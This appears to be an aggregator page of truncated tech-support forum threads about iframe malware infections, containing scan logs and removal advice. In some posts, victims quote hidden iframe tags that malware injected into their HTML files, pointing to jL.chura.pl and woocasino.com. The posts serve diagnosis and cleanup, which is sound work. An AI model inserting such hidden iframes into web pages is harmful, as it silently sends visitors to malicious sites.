Read other 3 answers
RELEVANCY SCORE 55.6

I already ran ComboFix before I found the preparation guide saying not to unless instructed - oops.

Iframe.inf infected my sites at Hostgator which they cleaed up overnight. I'm impressed.

Hostgator tech suggested scanning local system using multiple scanners for better results. I use Avast Internet Security and it reported no problems.

Is ComboFix log is enough to tell if infected or do I need to go through all the stuff listed in prep guide.

thanks in advance for any help you can render

ComboFix log below

ComboFix 11-03-11.02 - STAN 03/12/2011 16:09:45.3.1 - x86
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.1014.544 [GMT -5:00]
Running from: c:\downloads\Software\ComboFix.exe
AV: avast! Internet Security *Disabled/Updated* {7591DB91-41F0-48A3-B128-1A293FD8233D}
FW: avast! Internet Security *Disabled* {7591DB91-41F0-48A3-B128-1A293FD8233D}
* Created a new restore point
.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\documents and settings\STAN.STANCOMPUTER\Application Data\Microsoft\~DFK69783e.tmp
c:\documents and settings\STAN.STANCOMPUTER\Application Data\Microsoft\1eaadjc.dll
c:\documents and settings\STAN.STANCOMPUTER\Application Data\Microsoft\bass.dll
c:\documents and settings\STAN.STANCOMPUTER\Application Data\Microsoft\engine_vx.dll
c:\doc... Read more

A:Iframe.inf infected - yes or no?

Hello and welcome to Bleeping Computer We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here. Please take note: If you have since resolved the original problem you were having, we would appreciate you letting us know. If you are unable to create a log because your computer cannot start up successfully please provide detailed information about your installed Windows Operating System including the Version, Edition and if it is a 32bit or a 64bit system.
If you are unsure about any of these characteristics just post what you can and we will guide you.Please tell us if you have your original Windows CD/DVD available. If you are unable to perform the steps we have recommended please try one more time and if unsuccessful alert us of such and we will design an alternate means of obtaining the necessary information. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far. Upon completing the steps below another staff member will review your topic and do their best to resolve your issues. If you have already posted a DDS log, please do so again, as your situation may have changed. Use the '... Read more

Read other 3 answers
RELEVANCY SCORE 55.2

Hi Guys,

I have a problem with my computer.
looks i have a virus/malware inside my computer. I have to try to restore using system restore, seems i doesn't work.

This kind of <iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe> infected all of my HTML/PHP/ASPX files in my computer.
I had to try to delete it using notepad, but when i open it again. it still there.

Can sombody please help me, cause i still had a lot of work must be finished monday, and i can't continue to work if my computer still behave like this.

Here is log file using DDS i created to you guys. Thanks for your help

A:<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.comDDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the resul... Read more

Read other 2 answers
RELEVANCY SCORE 54.8

I have a small network that consist of a about 4 pc's and a web server. There has been some sort of virus infecting my web server. The virus injects my index.html files with malicious lines of codes directing users to a virus infected site. I am thinking that the virus is on one of my client pc's connecting to the server via ftp. I have ran multiple scans on the server and found nothing. Now I am leaning towards the pc's. I have posted the logs for of the first pc to review.Here is an example of the line of code this virus is putting in the index.html file of the websites:<iframe src="http://woocasino.com/s2/show.php" width="1" height="1" style="display:none;"></iframe></body>DDS (Ver_09-07-30.01) - NTFSx86 Run by richard.mcmaster at 15:23:49.85 on Fri 08/28/2009Internet Explorer: 7.0.5730.13 BrowserJavaVersion: 1.6.0_15Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.2014.742 [GMT -5:00]AV: McAfee VirusScan Enterprise *On-access scanning enabled* (Updated) {918A2B0B-2C60-4016-A4AB-E868DEABF7F0}============== Running Processes ===============C:\windows\system32\Ati2evxx.exeC:\windows\system32\svchost -k DcomLaunchsvchost.exeC:\windows\System32\svchost.exe -k netsvcssvchost.exesvchost.exeC:\windows\system32\spoolsv.exesvchost.exeC:\windows\IntelliAdminRC3\Agent32.exeC:\Program Files\Java\jre6\bin\jqs.exeC:&... Read more

A:Infected with Iframe virus

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the results.Foll... Read more

Read other 2 answers
RELEVANCY SCORE 54.8

I have a laptop running windows 7, eset security ver 4 and malwarebytes.
 
I ran a computer scan with eset and got the message saying I was infected with this virus and gave 2 different paths. It didn't give me the option to clean, only delete and do nothing. So I deleted the files, but they keep coming back. I'm not at my computer to send a screenshot.
 
Please let me know what I need to do to start the process of getting this virus out of my laptop, it's driving me nuts!

A:Infected with HTML/Iframe.B.Gen

Hello danny reboot into Safe Mode with Networking... Empty your temp folders using TFC (Temporary File Cleaner)
[list]Please download TFC by Old Timer and save it to your desktop.
alternate download linkSave any unsaved work. (TFC will close ALL open programs including your browser!)Double-click on TFC.exe to run it. (If you are using Vista, right-click on the file and choose "Run As Administrator".)Click the Start button to begin the cleaning process and let it run uninterrupted to completion.Important! If TFC prompts you to reboot, please do so immediately. If not prompted, manually reboot the machine anyway allowing Windows to load normally (not into Safe Mode) to ensure a complete clean.Run ESET again.

Read other 9 answers
RELEVANCY SCORE 54.8

My kids were on a MySpace page watching videos the other night and now if I try to go online for anything my avast software goes nuts and I get the line in the title. it says it is in the temp. internet files folder. I shut the computer down and let avast do a complete scan and I ran spybaster and AVG. All to no avail. S I come once again to the great guys and gals here at tech support for help. I also have a strange thing happen when I try to move a file, it moves but also brings up a box from Easy CD Creator and wants me to put in the CD to install. I don't even use that program. Weird. Below I have inclosed the files you asked for (DDS & Attach & GMER). Any help would be greatly appreciated.

GMER 1.0.15.14972 - http://www.gmer.net
Rootkit scan 2009-07-09 20:22:20
Windows 5.1.2600 Service Pack 2


---- Kernel code sections - GMER 1.0.15 ----

? srescan.sys The system cannot find the file specified. !
? System32\DRIVERS\AvgAsCln.sys The system cannot find the path specified. !
? C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.sys The system cannot find the file specified. !

---- User code sections - GMER 1.0.15 ----

.text C:\WINDOWS\system32\NOTE... Read more

A:Infected with hxxp:IFrame-HW[Trj]

Hello -

Please subscribe to this thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant Notification, then click Subscribe.

Before beginning the fix, read this post completely. If there's anything that you do not understand, kindly ask your questions before proceeding. Ensure that there aren't any opened browsers when you are carrying out the procedures below. Save the following instructions in Notepad as this webpage would not be available when you're carrying out the fix.

It is IMPORTANT that you don't miss a step & perform everything in the correct order/sequence.

---------------------------------------------------------------------------------------------

Please note that these fixes are not instantaneous. Most infections require more than one round to properly eradicate.

Stay with me until given the 'all clear' even if symptoms diminish. Lack of symptoms does not always mean the job is complete.

Kindly follow my instructions and please do no fixing on your own or running of scanners unless requested by me or another helper at this forum.

---------------------------------------------------------------------------------------------

Download ComboFix from this location:

Link 1

* IMPORTANT !!! Place combofix.exe on your Desktop
Disable your AntiVirus and AntiSpyware applications, usually via a right click on the Sy... Read more

Read other 19 answers
RELEVANCY SCORE 54.4

I posted late last night about getting a virus that took over my computer. Well I've been working on my brother's computer today and is now infected and I believe that the virus is in Evernote. I think I may even know the exact file that's spreading it. I feel bad for my brother because he doesn't have a lot of money to get a new computer. My computer that was infected Is my work computer and I am shipping it back to them for a format and reinstall. My brother's computer, the one that is infected now, is running Windows 8 Beta on a Dell latitude E 6500. As far as I can tell, without doing any more clicks or actions on my computer, it has taken over Internet Explorer with mirroring. Wow I really want to squash this virus. This would be the second computer of mine that it's infected today. I REALLY want to squash this virus. Having just found thIS sight last night, it's amazing what you guys are doing here. I thank each and everyone of you who are donating their time to help others not so lucky to be as computer savvy. Okay so now, who's going to take this mother effort down?

A:The 2nd computer infected by Mal/Iframe-AH today

Hello,let's see what we can find ....MiniToolBoxPlease download MiniToolBox, save it to your desktop and run it.Checkmark the following checkboxes:Flush DNSReport IE Proxy SettingsReset IE Proxy SettingsReport FF Proxy SettingsReset FF Proxy SettingsList content of HostsList IP configurationList Winsock EntriesList last 10 Event Viewer logList Installed ProgramsList Users, Partitions and Memory size.Click Go and post the result (Result.txt). A copy of Result.txt will be saved in the same directory the tool is run. Note: When using "Reset FF Proxy Settings" option Firefox should be closed.>>>>>Please Download TDSSkiller Launch it. Click on change parameters-Select TDLFS file system Click on "Scan".Please post the LOG report(log file should be in your C drive) Do not change the default options on scan resu>>>>Please download Malwarebytes Anti-Malware and save it to your desktop.Important!! When you save the mbam-setup file, rename it to something random (such as 123abc.exe) before beginning the download.Malwarebytes may "make changes to your registry" as part of its disinfection routine. If using other security programs that detect registry changes (ie Spybot's Teatimer), they may interfere or alert you. Temporarily disable such programs or permit them to allow the changes.Make sure you are connected to the Internet and double-click on the renamed file to install the application.When the installation begi... Read more

Read other 9 answers
RELEVANCY SCORE 54.4

Anyone heard of this bot? My internet provider recently disabled my internet and they said I had a bot with that name attempting to get into their server. I did a scan, and found some other bot, and deleted it. Anyone know anything about this virus? The dude on the tech support said he'd never heard of it.

A:visited-virut-infected-iframe

Haven't heard of is described exactly like that, but every AV vendor names things a bit differently. If you truly have that infection, your machine needs to be formatted.

Virut is a polymorphic file infector, capable of infecting all the machine's executable files (.exe) and screensaver files (.scr). However, the problem is that the virus has a number of bugs in its code, and as a result, it may misinfect a proportion of executable files and therefore, the files are corrupted beyond repair. As of now, security experts suggest that a format and clean install, or destructive recovery if you have an OEM recovery partition, is the best way to clean the infection and it is the best and safest way to return the machine to its normal working state.

Backup all your documents and important items (personal data, work documents, etc) only. DO NOT backup any executable files (softwares) and screensavers (*.scr). It attempts to infect any accessed .exe or .scr files by appending itself to the executable.

Also, avoid backing up compressed files (zip/cab/rar) files that have .exe or .scr files inside them. Virut can penetrate and infect .exe files inside compressed files too.

Recent variants also modify htm, html, asp and php files,injecting them to redirect to malicious sites.

Here's a sample writeup:

http://community.ca.com/blogs/securi...the-loose.aspx

Do not back up to another machine, as it may become compromised. Burn to DVD/CD, or to an external drive which has ... Read more

Read other 2 answers
RELEVANCY SCORE 54.4

I ran ESET online scanner becasue my PC was running slow and found the
HTML/Iframe.B.Gen virus.

What are the steps to getting rid of it forever?
 

A:I'm infected with the HTML/Iframe.B.Gen virus - help!

http://speccy.piriform.com/results/pGSzT8aH8JrdO3TzDA5MuSy
 

Read other 1 answers
RELEVANCY SCORE 53.6

Hello,
 
I am using Avast which began alerting me every time I opened a webpage, that it was infected with js:iframe via privoxy.exe.  I have downloaded both AdwCleaner and Farbar Recovery Scan Tool.  The logfile from Adwcleaner is as follows:
 
# AdwCleaner v4.208 - Logfile created 09/08/2015 at 16:56:57
# Updated 09/07/2015 by Xplode
# Database : 2015-08-01.1 [Server]
# Operating system : Windows 7 Ultimate Service Pack 1 (x64)
# Username : Graphic Gal - ALIENWARE
# Running from : C:\Users\Graphic Gal\Downloads\adwcleaner_4.208.exe
# Option : Cleaning
 
***** [ Services ] *****
 
[#] Service Deleted : PrivoxyService
 
***** [ Files / Folders ] *****
 
Folder Deleted : C:\Program Files (x86)\Conduit
Folder Deleted : C:\Program Files (x86)\DealPly
Folder Deleted : C:\Program Files (x86)\DealPlyLive
Folder Deleted : C:\Program Files (x86)\globalUpdate
Folder Deleted : C:\Program Files (x86)\iMesh Applications
Folder Deleted : C:\Program Files (x86)\predm
Folder Deleted : C:\Program Files (x86)\vGrabber-software
Folder Deleted : C:\Program Files (x86)\GUPlayer
Folder Deleted : C:\Program Files (x86)\AFC Secure Net
Folder Deleted : C:\Program Files (x86)\WebexpEnhancedV1
Folder Deleted : C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Conduit
Folder Deleted : C:\Windows\SysWOW64\config\systemprofile\AppData\Local\SearchProtect
Folder Deleted : C:\Program Files\Hola
Folder Deleted : C:\Users\Graphic Gal\AppData\Local\globalUpdate
Fol... Read more

A:Infected with Js:iframe/privoxy.exe trojan downloader?

Hi & to Bleeping Computer Forums!My name is Jürgen and I will be assisting you with your Malware related problems. Before we move on, please read the following points carefully: My native language isn't English. So please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.Please read my instructions completely. If there is anything that you do not understand kindly ask before proceeding.Perform everything in the correct order. Sometimes one step requires the previous one.If you have any problems while you are follow my instructions, Stop there and tell me the exact nature of your problem.If you have illegal/cracked software, cracks, keygens, etc. on the system, please remove or uninstall them now!Do not run any other scans without instruction or Add/ Remove Software unless I tell you to do so. This would change the output of our tools and could be confusing for me.Post all Logfiles as a reply rather than as an attachment unless I specifically ask you. If you can not post all logfiles in one reply, feel free to use more posts.If I don't hear from you within 5 days from this initial or any subsequent post, then this thread will be closed.If I don't reply within 24 hours please PM me!Stay with me. I will give you some advice about prevention after the cleanup process. Absence of symptoms does not always mean the computer is clean.Step 1Temporary disable your AntiVirus and AntiSpyware protection - instructions here.Please download... Read more

Read other 14 answers
RELEVANCY SCORE 52

Beginning 3/25 I started receiving virus alerts from Avira AntiVir Personal. Here is the first one:

<< Virus or unwanted program 'HTML/IFrame.DO.54 [virus]'
detected in file 'C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\EP52U43K\obana[9].htm.
Action performed: Deny access >>

This was also detected in certain other random recent directories under Content.IE5. Some of them appear to be accumulating junk -- css files, jpegs, html files -- from web sites I have never visited.

Please note: I do not use Internet Explorer! I use Firefox. So, there may be some malware downloading junk in the background.

Thank you!

*

.
DDS (Ver_2011-08-26.01) - NTFSx86
Internet Explorer: 8.0.6001.18702
Run by pointdextrous at 15:04:05 on 2012-03-27
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.2047.1321 [GMT -4:00]
.
AV: AntiVir Desktop *Enabled/Updated* {AD166499-45F9-482A-A743-FDD3350758C7}
.
============== Running Processes ===============
.
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
C:\Program Files\Intel\Wireless\Bin\EvtEng.exe
C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe
C:\Program Files\Intel\Wireless\Bin\WLKeeper.exe
svchost.exe
C:\Program Files&#... Read more

A:Infected with 'HTML/IFrame.DO.54 [virus]'; IE temp dirs fill with junk

Hello, Welcome to BleepingComputer.I'm nasdaq and will be helping you.If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps.===Download ATF Cleaner by Atribune from here hereand save it to your Desktop. Follow the instructions for the browser you use.Read the instructions about the cookies. Delete what you do not need.Double click ATF-Cleaner.exe to run the program. Check the boxes to the left of: Windows Temp Current User Temp All Users Temp Temporary Internet Files *Prefetch (Windows XP) only.Java CacheThe rest are optional - if you want to remove the lot, check "Select All". Finally click Empty Selected. When you get the "Done Cleaning" message, click OK. If you use the Firefox or Opera browsers, you can use this program as a quick way to tidy those up as well. When you have finished, click on the Exit button in the Main menu. For Technical Support, double-click the e-mail address located at the bottom of each menu. * The purpose of Prefetch folder is to increase the speed at which you can access the programs that you use on your PC. Unfortunately, Windows doesn't differentiate between a program you use every day and one you use every blue moon, which means that it may be prefetching a lot of stuff that you rarely use, adding to your startup time. You may find that the first time you boot up after cleaning out this folder, your PC takes longer to get into gear - the ... Read more

Read other 4 answers
RELEVANCY SCORE 38.8
Q: iframe

How do clear the iframe in netscape 7.0 and Internet explorer. The following code works in IE but not in netscape

<html>
<head>
<title>Simple Math Practice</title>


<script language="javascript" type="text/javascript">
<!-- Hide Script
function RandPosInt() {
Rnum = Math.round(Math.random()*8+1);
return Rnum;
}

function WriteHeader() {
problem.document.write('<html><head><link href="math.css" rel="stylesheet" type="text/css"><\/head><body>');
}

function WriteContent() {
problem.document.write("this is content");
}

function WriteFooter() {
problem.document.write("<\/body><\/html>");
}

function ClearFrame() {
problem.document.open();
problem.document.clear();
}

function CloseFrame() {
problem.document.close();
}


// End Hiding Script -->
</script>


<link href="math.css" rel="stylesheet" type="text/css">
</head>
<body>
<div align="center">
<h1>Simple Math Practice</h1>

<iframe
src="defaultframe.html" id="problem" name="problem" frameborder="1" marginwidth="10" marginheight="10" scrolling="no" align="top" height="200" width=&quo... Read more

A:iframe

That function is no longer supported. See here:
http://www.web-developer-india.com/web/jscript/refp_77.html
 

Read other 1 answers
RELEVANCY SCORE 38.8

I am working on a site using an IFrame. It is a copy of another site I have using the same IFrame. In the original site the homepage shows up on load but on the reworked site it loads the home page and then it disappears. I am using IE to view these pages.

A friend said he looked at the site in FireFox and it works correctly, so it leads me to believe it may be an IE thing but the original site works fine in IE.

I am out of ideas here. HELP!
 

A:IFrame help

post the sites url and I will check out the code....... if I can see it.

d.
 

Read other 2 answers
RELEVANCY SCORE 38.8

Still I frame. I have an Iframe on my site and I wanted to show only a certain part of the site inside it and unscrolable too. Can I tell the browser(s) to do this? and how. Please help.
 

A:Still Iframe - Please Help

Read other 12 answers
RELEVANCY SCORE 38.4

Description of my problem:We determine in our local network an instability, this is due to spread of malware through in it.The malware uses the method of attack based ARP to the local network Gateway (192.168.1.1).Indeed machine "A" owner of the MAC address "MacA" send packages ARP broadcast on the network indicating that the bridge is the machine A (192.168.1.1(the right address of Gateway) is at "MacA"), so many machines in our network used a wrong ARP i(I mean MACA of infected machines by this malware)After a long check on them to identify this malware. we found : these machines were infected by:svchost.exe" (175 KO, 179200 Bytes) uses the DLL Packet.dll and wpcap.dll and wanpacket.dll ... \ drivers \ npf.sys.- There realize a scan of all networks 192.168- and 172.16- and 10.0-- It has a "80-port insert" in the svchost paquet-at last we have another problem; when we open web page (as IE or Firefox) before we get the response and taking two or three seconds, the page displays a little gray bare (even we use windows or Linux system) and the view page source return this hxxp://218.75.91.248/iframe and this are included in the svchost.exe paquet but it was crypted.- Can somebody help me and explain me haw can we resolve this and clean our local network from this malwre? Thank's in advance

A:Iframe And Arp Spoofing

Please can somebody help me, nobody has an idea about this problem ?

Read other 4 answers
RELEVANCY SCORE 38.4

OS: Server 2008 R2 - SP1

IIS: 7.5.7600.16385

I have an iframe embedded into a web page which displays a pdf.  In chrome and other browsers the pdf displays fine inside the iframe; however, in IE the iframe forces a logout after redirecting them several times.  Chrome also does this redirect
but doesn?t end up forcing a logout.  Copying the source url from the iframe into a new tab in IE doesn?t force the logout and retrieves the pdf just fine which means it is directly related to this server?s handling of iframes specifically in all IE browsers
we support (IE 9+).  This scenario is unique to a specific server and doesn?t happen on ?identical? server environments.

I have used Process Monitor and am not seeing any permission errors or anything that immediately stands out.  If you have any thoughts on how to proceed or have any questions, please let me know.
I have also looked into KB 3154070 without success.

Read other answers
RELEVANCY SCORE 38.4

Hello Gracious Help,I run XP Pro on a Pentium 4, 3ghz (Dell GX270).3 days ago, I had my Firefox browser open, but had not used it or been at the puter for about 5 hours. When I sat down at the puter, there were perhaps 10 Avast warning pop-ups within about 15 mins - that said that it had blocked me from opening a malicious site. The trouble was, I was not trying to open any sites at this time. Two of the sites it specified were a beastiality site and a zoo site - neither of which I have ever been to.Avast seemed to block my browser from opening these sites, but my question is - what was directing my browser to go to them in the first place? The Avast warning said that the virus (or malware) that it was protecting me from was HTML:Iframe-infA web search came up with a few complex suggestions on how to rid of fix this problem, but all were too complex for me to follow.The hijacking or redirecting (or whatever it was) has not happened again since. I have had no further Avast warnings over the last 2 days. I first looked for help from the Avast website, and spoke to an IYogi support rep on the phone (whose number I got from the Avast website). He took remote control of my puter, checked my registry and said he could help if I bought a $186.00 support pkge (that provided support for 6 months). In retrospect, the "Help for Avast Free" phone number is just a marketing ploy to sell support packages. I just hope the guy did not add spyware or key loggers (or such... Read more

A:HTML : Iframe - inf

Hello again,

Today I had the same problem again. When Avast kept giving me warnings and notifications that it has protected me from going onto malicious websites (even when I wasn't surfing), I pushed "More Info" button on the Avast pop-up, which took me to the Avast webpages that explained more about the infection (and attempted browser hijackings or re-direction, or whatever it is).

I did this for two Avast warning pop-ups (that tried to take me to two different malicious sites). Below are the URL's to the two Avast webpages that opened, when I clicked the "more info" button on the warning pop-up:

hxxp://www.avast.com/en-ca/lp-security-information-fp2?p_ext=0&utm_campaign=Virus_alert&utm_source=prg_fav_60_0&utm_medium=prg_systray&utm_content=.%2Ffa%2Fen-ca%2Fvirus-alert-challenger2&p_vir=html:Iframe-inf&p_prc=file://C:\Program%20Files\Common%20Files\ComObjects\update.exe&p_obj=http://www.allzoomovies.com/?x=4302&p_var=.%2Ffa%2Fen-ca%2Fvirus-alert-default2&p_pro=0&p_vep=6&p_ves=0&p_lqa=0&p_lsu=24&p_lst=0&p_lex=162&p_lng=en&p_lid=en-ca&p_elm=7&p_vbd=1367
hxxp://www.avast.com/en-ca/lp-security-information-fp2?p_ext=0&utm_campaign=Virus_alert&utm_source=prg_fav_60_0&utm_medium=prg_systray&utm_content=.%2Ffa%2Fen-ca%2Fvirus-alert-challenger2&p_vir=html:Iframe-inf&p_prc=file://C:\Program%20Files\Common%20Files\ComO... Read more

Read other 41 answers
RELEVANCY SCORE 38.4

I m tired of searching about iframe alternative ..... after so much search i cant get what i wanted .

I m trying to include other domain HTML page in my HTML based email templates, Is there any other way to include the html pages from other domain in my HTML coding that is other than iframe?
 

Read other answers
RELEVANCY SCORE 38.4

I receive frequent emails from my friend's infected computer with random subject lines and random names with his files as an attachment.

Now, the problem is my AVG antivirus and Housecall do not detect any virus in these emails, but pandaactivescan detects this as "Exploit/iFrame".

I have XP pro, IE6 and Outlook express6 and have even installed the patch for this vulnerability that actually affects IE5.5 and IE5.01 only(http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-020.asp).

IS my computer infected?
 

A:Exploit/iFrame

Read other 9 answers
RELEVANCY SCORE 38.4

Hi,
I work on portals. In ePhox editLive editor I am using iFrame which in turns diplay a intranet site with in this iFrame. This site includes a selectbox for locations. When site is displyaed first time select box is not visible to end user but when we click on any button and this page again renders this select box is also available.
I right click on site when select doesnt appears but for my surprize code for select box is there in view source. I am not getting why it is not visible if code is there in view source.
Also, When I open this site in internet explorer without any iframe select box is visible there.

Can anyone please help why it is happening like that??

Regards,
Rohit Sharma

Read other answers
RELEVANCY SCORE 38.4

My PC was working very well and had no problem. I turned off after my work one night and when I switched on the next morning it does not open my home page. When I try to open my antivirus Avast gives me warning. The name of the virus is HTML:Iframe-inf Please help me to get rid of this. I am not able to ope my home Page.
More over my system has become very slow especially during the start up. Please help.
Thank you!

Read other answers
RELEVANCY SCORE 38.4

I have searched posts here for other virus help and have downloaded the Malwarebytes that was suggested and will put copy on the infected computer. I have run my Avast Antivirus and the OneCare but still have problems.QUESTIONS:1-Does this Malwarebytes program have any problems with other Antivirus progams running?2-Will this program get rid of the iframe virus? 3-I noticed a strange program in my msconfig StartUp it was named freddy42 I have disabled it. I have checked and now know it is part of this virus. 4-Should I have diabled freddy 42? I think that is why I may be still infected.5-Do I need to have all programs enabled in my StartUp to ensure complete virus removal.6- Can the infected computer infect laptop, it is on shared network? I have disabled all sharing folders and files with infected computer.I took a picture of the message as it is loading the bogus page. It says: waiting for res://ieframe.dll/dnserrror.htm. I can't log on anywhere to get more info or help so I am using my laptop now to get work done....

A:IFrame Virus

In answer to question onePrograms that monitor and prevent registry changes such as Spybot S&D Teatimer function and Winpatrol need to be disabledIn answer to number two post a log and we'll take it from thereDisable freddy42 using Autorunshttp://technet.microsoft.com/en-us/sysinte...s/bb963902.aspxNumber 5 - noNumber 6 - yesAre you using a digital picture frame? Whatever USB attachment it is, do not use it right nowI'm moving this to AII-----------------------------------------------------The process of cleaning your computer may require you to temporarily disable some security programs. If you are using SpyBot Search and Destroy, please refer to Note 2 at the bottom of this page.Please download Malwarebytes Anti-Malware and save it to your desktop.alternate download link 1alternate download link 2Make sure you are connected to the Internet.Double-click on mbam-setup.exe to install the application.When the installation begins, follow the prompts and do not make any changes to default settings.When installation has finished, make sure you leave both of these checked:Update Malwarebytes' Anti-MalwareLaunch Malwarebytes' Anti-MalwareThen click Finish.MBAM will automatically start and you will be asked to update the program before performing a scan.If an update is found, the program will automatically update itself.Press the OK button to close that box and continue.If you encounter any problems while downloading the updates, manually download them from here and just double-... Read more

Read other 6 answers
RELEVANCY SCORE 38.4

I have a page index.shtml, and there is an iframe in that page. The iframe is called downloadiframe. Now I have a button in my forums that I want to link to my downloads page.

Here's My problem. When you click the "download" button on my page, you go into my downloads page. But I want it to open index.shtml with the downloads page in the iframe, downloadsiframe. How do I do this?
 

A:IFrame Problems

Read other 8 answers
RELEVANCY SCORE 38.4

On my site, I have darkish colors; blue, grayish-black, etc. But I have an IFRAME of a page from another site, which has white background and black text, so it doesnt fit in with my page. I already have the CSS for my page colors, can I apply this to the Iframe, or is there another way I can change its background color?

Since the Iframed page is on someone else's site, I can not modify that file itself. And many of you will probably tell me an iframe is not good to use in page design, I have decided its the best way to accomplish what I want.
 

A:Formatting an IFRAME

if you know this person and they're okay with you mirroring their site, you could ask them to use DIV id's and SPAN id's and set their tags to CSS id's that you know of, then name your CSS id's the same. you'd have to put a LINK REL tag in the HEAD and both you and the person who owns the site would need to have it point to CSS in the main directory with the same file name. everything would have to correlate.
 

Read other 2 answers
RELEVANCY SCORE 38.4

I have just had 3 securtiy alert messages from AVIRA,don't know if it would have any connection :
C:\users\XXXX\AppData\Local\Microsoft\...\b(1).js contains suspiscious code HEUR/HTML. malware, the same version b(2)
and detection pattern of the java script virus JS/Dldr.Iframe.BO
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 20:04:02, on 22/06/2008
Platform: Windows Vista SP1 (WinNT 6.00.1905)
MSIE: Internet Explorer v7.00 (7.00.6001.18000)
Boot mode: Normal

Running processes:
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Windows Defender\MSASCui.exe
C:\Windows\RtHDVCpl.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe
C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\Windows Live\Family Safety\fssui.exe
C:\Program Files\TalkTalk\bin\sprtcmd.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktopIndex.exe
C:\Windows\System32\rundll32.exe
C:\Program Files\COMODO\Firewall\cfp.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Windows\ehome\ehtray.exe
C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
C:\Program Files\Common Files\Nero\Lib\NMBgMonitor.exe
C:\Program Files\Windows Media Player\wmpnscfg.exe
C:\Program Files\Windows Live\Messenger\msnmsgr.exe
C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
C:\Windows\System32\rundl... Read more

A:JS/Dldr.Iframe.BO

Read other 6 answers
RELEVANCY SCORE 38.4

on my site i have a link i use for users to view tax records in my county and i would like to have the users not leave my site,so i used an iframe,but im havin an issue after agreeing to their usage terms,users cannot access the site or it doesnt redirect to the corresponding/next page,as in enter here and i cant bypass it because it will auto redirect. any suggestions WITHOUT using a new page or opening in a new window ??

www.townhousesandvillas.com/taxrecords.html

oh and take it easy on me...im new
 

A:iframe or equal...

Read other 16 answers
RELEVANCY SCORE 38.4

Alright here the deal i have a transparent iframe with the content visable but the scrollbars are transparent and i dont want that...so is there anyway to have a transparent iframe with visable content and visable scrollbars?
 

A:Transparent iFRAME

Read other 12 answers
RELEVANCY SCORE 38.4

ok.... so what i want to do is have an iframe over top of an image (which i have figured out), but then, i want that iframe to have a lower opacity so that you can kind of see the picture that the iframe is over top of. i've read a ton of stuff about transparency and opacity and i've tried a few different things, none seem to work though. i've been able to change the opacity of the iframe fine, but rather than having my image come through, the bg color (which is black) comes through.

please help and thanks in advance

carson

ps - think of it like a layer in photoshop where you can just change the opacity to have the layer behind it show through.
 

A:Need help with iframe opacity...

well I am not too sure, but I think you would have to change the alpha opacity in the code for the page within the iframe. So if your iframe is linkted to "pagename.htm" then you have to use alpha opacity on the "pagename.htm" page, as opposed to the page including the iframe. However, I may be way off track on this one! This is all I can offer is an idea...
 

Read other 2 answers
RELEVANCY SCORE 38.4

Hi Folks,From threatpost :New Firefox iFrame Bug Bypasses URL Protections. http://bit.ly/as6VH9CheersKarstenHansen

Read other answers
RELEVANCY SCORE 38.4

